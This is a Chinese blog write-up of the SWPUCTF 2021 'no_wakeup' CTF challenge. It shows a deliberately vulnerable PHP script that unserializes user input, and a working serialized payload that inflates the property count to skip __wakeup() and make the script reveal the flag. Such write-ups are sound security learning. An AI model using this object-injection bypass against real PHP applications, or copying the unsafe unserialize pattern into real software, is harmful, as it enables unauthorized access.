[SWPUCTF 2021 新生赛]no_wakeup

最新推荐文章于 2024-05-31 11:03:01 发布
最新推荐文章于 2024-05-31 11:03:01 发布
阅读量275 收藏 3
点赞数 6
分类专栏: 学习 笔记 CTF学习 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45530465/article/details/138950637
版权
笔记 同时被 3 个专栏收录
5 篇文章 0 订阅
订阅专栏
学习
3 篇文章 0 订阅
订阅专栏
CTF学习
1 篇文章 0 订阅
订阅专栏

[SWPUCTF 2021 新生赛]no_wakeup
继续在NSSCTF刷题

进入网站后发现如下代码:
image.png

<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
  public $admin;
  public $passwd;

  public function __construct(){
    $this->admin ="user";
    $this->passwd = "123456";
  }

  public function __wakeup(){
    $this->passwd = sha1($this->passwd);
  }

  public function __destruct(){
    if($this->admin === "admin" && $this->passwd === "wllm"){
      include("flag.php");
      echo $flag;
    }else{
      echo $this->passwd;
      echo "No wake up";
    }
  }
}

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?>

分析

分析代码之后发现当admin = "admin"和passwd ="wllm"时就会输出flag
但有一个魔法方法:_wakeup():

当你使用serialize()函数将一个对象转换为字符串以便存储或传输时,该对象的所有公共属性(public)、保护属性(protected)和私有属性(private)都会被保存。但是,对象的某些状态或资源(如打开的数据库连接、文件句柄等)不会被保存。
然后,当你使用unserialize()函数将这个字符串转换回对象时,PHP会重新创建该对象并恢复其所有保存的属性值。但是,在恢复对象之前,PHP会检查该对象是否有一个__wakeup()方法。如果有,那么在恢复对象的属性之前,PHP会调用__wakeup()方法。

经过学习之后了解到:
_wakeup()绕过方法:

__wakeup()函数漏洞:
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行

构造payload:

<?php
class HaHaHa{
    public $admin = "admin";
    public $passwd = "wllm";
}
$bx = new HaHaHa();
echo serialize($bx);
?>

image.png
当输入这个payload时,发现_wakeup方法执行了
所以此时修改payload来绕过方法
image.png

修改后:
p=O:6:“HaHaHa”:3:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;}

image.png
得到NSSCTF

BX 同学
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wakeup_asm.rar_startup_wakeup
09-19
ACPI wakeup real mode startup stub.
SWPUCTF 2021 新生-WEB部分wp
m0_74606212的博客
09-23 407
SWPUCTF 2021 新生-WEB部分wp
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 1万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
NSS [SWPUCTF 2021 新生]no_wakeup
Jay17的博客
07-04 473
NSS [SWPUCTF 2021 新生]no_wakeup
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1025
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
反序列化 [SWPUCTF 2021 新生]no_wakeup
m0_75178803的博客
12-21 395
题目很简单,只需要使得admin=admin并且passwd=wllm,则可获取到flag,但是其中多了一个__wakeup的魔术方法。​ __wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。知道是反序列化,我们直接写给payload出来,然后get传参。我们修改一下即可绕过。
NSSCTF | [SWPUCTF 2021 新生]no_wakeup
2302_80946742的博客
05-22 1020
方法中的检查条件,需要确保序列化字符串中声明的属性数量与实际属性数量一致,但故意声明一个错误的数量。的值,我们需要利用PHP反序列化中的一个特性:如果序列化字符串中的属性数量与实际属性数量不匹配,然后,我们序列化这个对象,并修改序列化字符串,将属性数量从2改为1,这样在反序列化时。但生成的这个序列化字符串是不可以输出flag的,真正可以输出flag的序列化字符串是。在原始的序列化字符串中,将属性数量从2减少到1,这是为了绕过。,你需要构造一个序列化字符串,使得反序列化后的对象满足。打开题目后,点击三个?
WakeUP_Poweroff.rar_WakeUP_Poweroff_delphi_delphi 托盘_网络唤醒
09-19
网络唤醒的原理及实例,托盘实例,定时关、ini文件的操作等。
[我们用的]AS3932_LF_Wakeup_Receiver_Datasheet_v1_4
02-16
[我们用的]AS3932_LF_Wakeup_Receiver_Datasheet_v1_4
hh_Bot_wakeUp
02-22
hh_Bot_wakeUp
WakeupTimer_INT.rar_T7Z_Wakeup Output_反射 红外_液位检测_红外反射式液位检测
09-15
通过检测红外的反射强度来判断液体的位置。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8253
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全行为可控定义以及表现内容简述
行云管家
05-28 339
在数字化快速发展的今天,网络安全已成为国家和企业不可或缺的防线。据统计,网络攻击事件频发,给全球经济带来了巨大损失。因此,确保网络安全行为可控显得尤为重要。今天我们来聊聊网络安全行为可控定义以及表现内容。
网络安全的神秘世界】使用vulhub搭建漏洞测试靶场
weixin_54750312的博客
05-31 207
Vulhub是一个基于docker和的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
网络安全的神秘世界】在win11搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 581
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
网络安全的神秘世界】MySQL
weixin_54750312的博客
05-31 185
数据库(Database)是按照数据结构来组织、存储和管理数据的仓库。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 994
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
网络安全||信息加解密技术以及密钥管理技术
2401_84434570的博客
05-31 579
IDEA:128位密钥、64位数据块、比DES的加密性好、对计算机功能要求相对低,PGP。对称加密(又称为私人密钥加密/共享密钥加密):加密与解密使用同一密钥。非对称加密(又称为公开密钥加密):密钥必须成对使用(公钥加密,相应的私钥解密)。:高级加密标准,又称Rijndael加密法,是美国政府采用的一种区块加密标准。,现在通用的证书一般采用UTC时间格式,它的计时范围为1950-2049;:替换+移位、56位密钥、64位数据块、速度快、密钥易产生。2048位(或1024位)密钥、计算量极大、难破解。
RTC_WAKEUP
03-20
RTC_WAKEUP是Android系统中的一个常量,用于设置定时唤醒设备的类型之一。RTC_WAKEUP使用的是实时时钟(RTC)来触发设备的唤醒,即在指定的时间点唤醒设备。 RTC_WAKEUP常常用于实现一些需要在特定时间执行的任务,比如闹钟应用程序。通过设置RTC_WAKEUP,可以确保设备在指定的时间点唤醒,即使设备处于休眠状态也可以执行任务。 相关问题: 1. RTC_WAKEUP是什么意思? 2. RTC_WAKEUP常常用于哪些场景? 3. 如何在Android中设置RTC_WAKEUP? 4. RTC_WAKEUP和其他唤醒类型有什么区别?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值